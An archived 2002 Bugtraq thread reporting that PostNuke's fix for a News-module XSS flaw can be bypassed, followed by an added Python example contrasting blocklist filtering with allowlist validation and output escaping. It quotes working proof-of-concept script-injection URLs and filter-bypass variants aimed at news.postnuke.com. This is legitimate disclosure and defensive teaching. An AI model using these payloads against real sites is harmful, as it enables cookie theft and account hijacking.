Bugtraq
mailing list archives
Re: Postnuke XSS fixed
From: Muhammad Faisal Rauf Danka <mfrd () attitudex com>
Date: Wed, 2 Oct 2002 16:24:15 -0700 (PDT)
I just checked it again:
http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
where + denotes a blank space or similarly this one:
http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script%20>alert(document.cookie);</script>
resulting in the "Sorry - $HTTP_GET_VARS contains javascript..." message.
However the request:
?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
or any character inserted before the first "script" and after the first less-than sign "<" results in a DB Error, revealing nothing
(user/pass/path etc.).
But I used IE and Netscape, maybe it's different with other browsers. :)
Regards
--------
Muhammad Faisal Rauf Danka
Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202
--- Daniel Woods <dwoods () ucalgary ca> wrote:
Humm!
on 26th Sep the following url:
http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
used to give Alert PopUp and
Error:
DB Error: getArticles: 1064: You have an error in your SQL syntax near '=' at line 23
now it gives:
Sorry - $HTTP_GET_VARS contains javascript...
Prompt fix by PostNuke team, great work Keep it up! :)
Not so fast on the praise :(
It only took me a couple of workarounds to find ways to bypass the check.
http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
Using the request...
?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
gives me the DB Error: message
And using the request...
?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
gives me the Alert Popup and DB Error: message... the '+' is treated as a blank.
Thanks... Dan.
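An added example (not PostNuke's code, nor anything posted in this thread) contrasting a blocklist check of the kind the thread describes with the allowlist validation and output encoding that actually close this class of hole. The exact shape of PostNuke's patched check is an assumption, since the thread only shows its error message; the request strings are reconstructed from the URLs quoted above.

```python
import html
import re
from typing import Optional
from urllib.parse import unquote_plus

def get_param(query_string: str, name: str) -> str:
    """Minimal query-string parser; '+' and '%20' both decode to a space,
    which is the behaviour Dan notes in the thread."""
    for pair in query_string.lstrip("?").split("&"):
        key, _, raw = pair.partition("=")
        if unquote_plus(key) == name:
            return unquote_plus(raw)
    return ""

def naive_blocklist_filter(value: str) -> bool:
    """ASSUMED shape of the patched check (not PostNuke's real code): accept
    the value unless it contains the literal token '<script>'. Any byte
    between '<' and 'script', or between 'script' and '>', slips past it."""
    return "<script>" not in value.lower()

def strict_sid_validator(value: str) -> Optional[int]:
    """Allowlist check: sid is an article id, so only a positive integer is
    acceptable; anything else is rejected before SQL or HTML is built."""
    return int(value) if re.fullmatch(r"[1-9][0-9]*", value) else None

def safe_output(value: str) -> str:
    """Output encoding: if a rejected value is ever echoed in an error page,
    escape it so it renders as text rather than markup."""
    return html.escape(value, quote=True)

# Requests quoted in the thread (constructed here from the URLs above).
REQUESTS = {
    "plain":     "?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>",
    "plus":      "?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>",
    "pct20":     "?op=modload&name=News&file=article&sid=<script%20>alert(document.cookie);</script>",
    "backslash": "?op=modload&name=News&file=article&sid=<\\script>alert(document.cookie);</script>",
    "normal":    "?op=modload&name=News&file=article&sid=42",
}

def evaluate(query_string: str) -> dict:
    """Run one request through both checks and the output encoder."""
    sid = get_param(query_string, "sid")
    return {
        "sid": sid,
        "blocklist_accepts": naive_blocklist_filter(sid),
        "allowlist_sid": strict_sid_validator(sid),
        "escaped": safe_output(sid),
    }
```

The blocklist stops only the "plain" request and lets the "plus", "pct20" and "backslash" variants through, while the integer allowlist rejects all four and accepts only "normal".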